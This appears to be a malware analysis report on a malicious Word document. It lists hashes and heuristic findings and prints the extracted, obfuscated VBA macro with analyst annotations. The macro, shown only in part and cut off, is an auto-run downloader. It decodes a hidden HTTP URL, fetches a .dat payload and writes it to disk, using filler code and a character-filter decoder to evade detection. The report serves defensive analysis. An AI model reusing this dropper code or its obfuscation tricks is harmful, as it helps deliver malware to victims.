Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 da542d79850255bd…

MALICIOUS

Office (OLE)

93.5 KB Created: 2016-05-30 01:23:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: 9b60685a090f48316972863580d13900 SHA-1: 18d594d5a79f457f3fd30baca62cfb5edb218c3b SHA-256: da542d79850255bdf9bad83b4a968c3243a47dc5b1a3d683b7e51c25dbf208f2
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The macro uses CreateObject and CallByName, indicating that it is designed to run arbitrary code. Although no specific URLs or payloads were extracted, the presence of these elements strongly suggests that the document's purpose is to download and execute a secondary malicious payload.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15770 bytes
SHA-256: 4f327a332d825c45652737392b569161ba1b3b5f026a144e0c3ffc29cdb67ada
Preview script
First 1,000 lines of the extracted script
' --- ThisDocument (document class module) ---
' Export attributes of the document module. VB_PredeclaredId = True and VB_Exposed = True
' are the usual settings for a Word ThisDocument module; what makes this sample
' auto-execute is the Document_Open handler defined further down in this module.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' OEMWfnTNzNAa: not called from any procedure in the extracted listing, and every
' name it references (lNWbDXPZykQjnC, aIazdevr, yPsCNPssGyiOpN, NjIyodZJSVmYfi, qmIeR,
' WEWJNBAlbfoeL, DAUosIn, CcVIZQDGBz) is undefined in the visible source. Reads as
' junk/decoy code that pads the module; the only concrete behaviour is the constant
' return value 5291. Both arguments (kEmNZLn, pUQDO) are unused.
Private Function OEMWfnTNzNAa(ByVal kEmNZLn As String, ByVal pUQDO As String) As Integer
lNWbDXPZykQjnC
xYGCrAfNU = 6891
aIazdevr 4165
yPsCNPssGyiOpN 7578, "QLjTiJyxkvHq3D3xoJ"
If NjIyodZJSVmYfi Then
qmIeR "Tc5GTfIJ7DdJykponF2TvjzdnDdkq5", True, "CR5nll4nqHu2yZ3XoSjvZjPprOKLz"
WEWJNBAlbfoeL "75yJtcASgwEAVWYHBzmb1UceE92k8L", True
DAUosIn
Else
CcVIZQDGBz 1146
End If
OEMWfnTNzNAa = 5291
End Function
' hKqOqK: not called anywhere in the extracted listing; TeWBtwRjPIlabt, eChsuJzQdyZ
' and sfYHcObVOTvE are undefined in the visible source. Same filler pattern as
' OEMWfnTNzNAa - nothing here contributes to the macro's observable behaviour.
Private Sub hKqOqK(ByVal IfkvY As String, ByVal isEBabzjVW As Integer)
TeWBtwRjPIlabt "EBZ4lSC8U8cOT4AXXC1KYoAir3H", 5222, True
eChsuJzQdyZ
sfYHcObVOTvE 7063
End Sub
' uCazxXMenr: not called anywhere in the extracted listing. oOHmni, NwkbshfERc and
' YMGoUeYFXwuwr are undefined in the visible source; the function always returns the
' fixed string "1T251UeVLs4ojGYnZX". Filler, not part of the execution chain.
Private Function uCazxXMenr() As String
If oOHmni Then
NwkbshfERc
Else
YMGoUeYFXwuwr 2523
End If
uCazxXMenr = "1T251UeVLs4ojGYnZX"
End Function
' Document_Open: Word auto-execution entry point - runs as soon as the document is
' opened with macros enabled (the OLE_VBA_DOCOPEN finding in the report above).
' QuVBLoFVmJ is declared but never used and rdYkMVXOybK = 5132 has no visible consumer;
' both are filler. The only meaningful statement is the call into ZTRLmRY.IeltIyKRyTF,
' so the real chain starts in module ZTRLmRY.
Private Sub Document_Open()
Dim QuVBLoFVmJ As String
rdYkMVXOybK = 5132
ZTRLmRY.IeltIyKRyTF
End Sub
' HVptOfWeqFdD: not called anywhere in the extracted listing. ELqtEE, LbiswoA,
' PjwNogbxKJYdhp and AIgTVkicIiowa are undefined in the visible source; the function
' always returns False and ignores both arguments. Filler like the other ThisDocument
' helpers.
Private Function HVptOfWeqFdD(ByVal ibPzahNpHBa As Integer, ByVal cVprSeCGn As String) As Boolean
ELqtEE 564, 1218, "fYhSanXTOsUyz4G11"
Wujyauj = 5855
LbiswoA 1901, "FZeNvsNzHi9n0IXHl5qfOQMlvIv"
PjwNogbxKJYdhp 7473
AIgTVkicIiowa 238, "jQ2RCZ3flRQoFBoeBw", "csxxOj5E4fAkaVs3SIm6hCznES74xLf"
HVptOfWeqFdD = False
End Function

' --- ZTRLmRY (standard module): the code reached from Document_Open; appears to hold
' the fetch-and-write chain (IeltIyKRyTF -> HfqHLHZbDWXG -> LUmzLGgdHt). ---
Attribute VB_Name = "ZTRLmRY"
' HfqHLHZbDWXG: second stage, called from IeltIyKRyTF. igRuTIDG and tkkycPmxl = 7110
' are filler. Passes zmAFY.xCgUgpbq (zmAFY is not defined in this preview - presumably
' a destination path, confirm), the constant 1503, and the string decoded by
' zuyIhzjGWMJA to LUmzLGgdHt, then hands the same zmAFY.xCgUgpbq value to
' zmAFY.LtQQqEcNTgunYW. Consistent with "fetch to a path, then act on that path";
' the second step's behaviour must be confirmed from a sandbox run since the callee
' is outside this listing.
Private Sub HfqHLHZbDWXG()
Dim igRuTIDG As Integer
tkkycPmxl = 7110
LUmzLGgdHt zmAFY.xCgUgpbq, 1503, zuyIhzjGWMJA
zmAFY.LtQQqEcNTgunYW zmAFY.xCgUgpbq
End Sub
' IeltIyKRyTF: public entry point invoked by ThisDocument.Document_Open.
' OXCJNgpDtFM = 4891 is filler. "On Error GoTo ymplNbbZN" routes any runtime error to a
' label with no handler body, so a failure anywhere in the chain ends the macro
' silently with no user-visible prompt - worth remembering when a sandbox run shows
' no network or file activity. NanxJOZRPgXjf (and its yUYnKpy / LInuQiCINRGQ members)
' is not defined in this preview; HfqHLHZbDWXG above is the next visible stage.
Public Sub IeltIyKRyTF()
OXCJNgpDtFM = 4891
On Error GoTo ymplNbbZN
NanxJOZRPgXjf.yUYnKpy
NanxJOZRPgXjf.LInuQiCINRGQ
HfqHLHZbDWXG
Exit Sub
ymplNbbZN:
End Sub
' LUmzLGgdHt(PmvDNPhbtLk, hbOnwg, GqfmFq): the routine the CreateObject/CallByName
' heuristics point at. SUmbbGJsrQGlCr, zmAFY and JwYwcNCOgCBwx are not defined in this
' preview, so the reading below is inferred from the visible calls and decoded strings:
'  - BIQbSq(..., GqfmFq, ...): an object is obtained using GqfmFq, which the caller
'    fills with the URL-shaped value decoded by zuyIhzjGWMJA.
'  - CkIEnCkFfLK obj, PgkLSbQzzWryIn("CSajSn'UUtU ...", "gp.9SJ5Uj"): dropping the
'    filter characters from that literal leaves "Can't download binary file", i.e. a
'    status/error string (decoder rule inferred from PgkLSbQzzWryIn - confirm).
'  - RJkrOlROSrZNDx(obj, PgkLSbQzzWryIn("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q")): the
'    decoded member name is "ResponseBody"; its value is handed to zmAFY.equhCgWhZp
'    together with PmvDNPhbtLk, presumably writing the fetched body out under that path.
' Net effect, pending dynamic confirmation: an HTTP fetch whose response body is saved
' locally, performed through a late-bound object with members resolved by name.
' hbOnwg and DVrCCocfjsOyZm are unused; the other string literals' role is not visible here.
Private Sub LUmzLGgdHt(ByVal PmvDNPhbtLk As String, ByVal hbOnwg As Integer, ByVal GqfmFq As String)
Dim DVrCCocfjsOyZm As Integer
Set OSuWuqT = SUmbbGJsrQGlCr.BIQbSq("7DAiIjyApsFWR2b9rd6tCgQ9hzmH", GqfmFq, "jQy98rK5A8fEjlnT1Uad84cFxu")
SUmbbGJsrQGlCr.CkIEnCkFfLK OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
zmAFY.equhCgWhZp PmvDNPhbtLk, JwYwcNCOgCBwx.RJkrOlROSrZNDx(OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
' NeTnC: late-bound object factory - CreateObject(sdTFLdHw) with the ProgID supplied
' by the caller (the OLE_VBA_CREATEOBJ finding). No caller appears in this preview, so
' the ProgID itself is not visible here. NyEjjJOeppzvOE and the two Dim'd strings are
' unused; the created object passes through tvuwZWCvZhgWlH, which returns it unchanged.
Public Function NeTnC(ByVal NyEjjJOeppzvOE As String, ByVal sdTFLdHw As String) As Object
Dim pXNhOhhlfvQYW As String
Dim JvrVRRrIkDqj As String
Set NeTnC = tvuwZWCvZhgWlH(CreateObject(sdTFLdHw), False, False)
End Function
' tvuwZWCvZhgWlH: identity pass-through; both Boolean arguments are ignored. Its only
' purpose is to put a hop between CreateObject and the consumer of its result, which
' defeats naive "Set x = CreateObject(...)" pattern matching.
Private Function tvuwZWCvZhgWlH(ByVal jEvgfVKxGMtEx As Object, ByVal dNBIYwL As Boolean, ByVal LPleCMTEk As Boolean) As Object
Set tvuwZWCvZhgWlH = jEvgfVKxGMtEx
End Function
' zuyIhzjGWMJA: returns the decoded fetch target used by HfqHLHZbDWXG / LUmzLGgdHt.
' PgkLSbQzzWryIn appears to drop every character of its second argument ("bY9WML")
' from the first; applying that rule to the literal leaves a string beginning
' "http://" and ending ".dat", i.e. an HTTP URL to a .dat payload. That URL is the key
' network IoC for this sample - confirm the decoder (its helpers are outside this
' preview) or recover the URL from a sandbox run before acting on it.
Private Function zuyIhzjGWMJA() As String
zuyIhzjGWMJA = gAdcATNCVnZS.PgkLSbQzzWryIn("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function

' --- gAdcATNCVnZS (standard module): string decoder (PgkLSbQzzWryIn / xurZbHiOIAcCvh)
' plus more filler procedures. Listing is truncated after this module. ---
Attribute VB_Name = "gAdcATNCVnZS"
' PgkLSbQzzWryIn(gwLgQ, tPCdqy): string decoder used for every meaningful literal in
' module ZTRLmRY. cXfrU and mwYnHDX are not defined in this preview, so the exact
' semantics are inferred: the loop looks like "for each position in gwLgQ", with
' wVpDPwrVlS yielding the character at that position, xurZbHiOIAcCvh (below) keeping it
' unless it occurs in tPCdqy, and QQoki appending the kept character to the result.
' Applying that rule to the two literals in LUmzLGgdHt yields readable English
' ("Can't download binary file", "ResponseBody"), which supports the reading.
' VqVNGbMrhz is unused; the extra string literals passed to the cXfrU helpers look like
' filler, but their role cannot be confirmed from this listing.
Public Function PgkLSbQzzWryIn(ByVal gwLgQ As String, ByVal tPCdqy As String) As String
Dim VqVNGbMrhz As Boolean
For fQwLCKC = mwYnHDX To cXfrU.zcNPzc("JKfPgfJhcKHSbEEA3HLGz9GFQINRMJRh6", gwLgQ)
PgkLSbQzzWryIn = cXfrU.QQoki("qokImbaq3kdd6keZ5NeloJVNPe", PgkLSbQzzWryIn, 8054, xurZbHiOIAcCvh(tPCdqy, cXfrU.wVpDPwrVlS(fQwLCKC, "T2uCee33zvXfolvMcgj", gwLgQ)))
Next
End Function
' kJWXGQFTW: not called anywhere in the extracted listing. VXJfqbSP, zVAAaHy, jRWGpPV,
' OtEdnsXfbIU and HfkDIKvuOvNV are undefined in the visible source and the assigned
' variables have no consumer. Filler that pads the decoder module.
Private Sub kJWXGQFTW(ByVal QYURU As Boolean)
kWQntlSa = "gATjq1CKBKYu2LCuoJRy9mx"
VXJfqbSP 4633, "IvO70p0tZ3UKYSdyaDugrW"
zVAAaHy "wv0kZZuOdF1BBAGfSSqHZB", "foSqSLxBXhwpwpMiHz3R", "ETu5lDkIFxmfvJW2OEpU"
YBsWLiizT = False
jRWGpPV "9OsV7vnTWiDU1mgggGLiMXW8WWs"
OtEdnsXfbIU 7882
wYMGZVuWWXY = 779
HfkDIKvuOvNV
End Sub
' PdXPfFkfboaF: not called anywhere in the extracted listing; qlgQJwp and NRIoJ are
' undefined in the visible source and NtQSYMjGdrJNEM has no consumer. Filler.
Private Sub PdXPfFkfboaF()
If qlgQJwp Then
NRIoJ
NtQSYMjGdrJNEM = "ldlQ19QhOknTinh7hhONPTc3"
End If
End Sub
' xurZbHiOIAcCvh(OGbCxSQtjvXeL, eLOWeelSAhD): filter step of the decoder. Returns
' eLOWeelSAhD (one character, per the caller in PgkLSbQzzWryIn) when
' cXfrU.JdYJTAZ(...) is False; otherwise the return value is never assigned, so VBA
' yields "" and the character is dropped. JdYJTAZ is undefined in this preview -
' presumably an InStr-style "does eLOWeelSAhD occur in OGbCxSQtjvXeL" test (confirm).
' The two Dim'd locals are unused; the extra literal and numeric arguments passed to
' JdYJTAZ have no visible meaning here.
Private Function xurZbHiOIAcCvh(ByVal OGbCxSQtjvXeL As String, ByVal eLOWeelSAhD As String) As String
Dim rawcsCuVbm As Integer
Dim qOunYEyoWN As String
If Not cXfrU.JdYJTAZ(eLOWeelSAhD, "Ui08UAFZHvMTWDh4YUo", OGbCxSQtjvXeL, 4638) Then
xurZbHiOIAcCvh = eLOWeelSAhD
End If
End Function
... (truncated)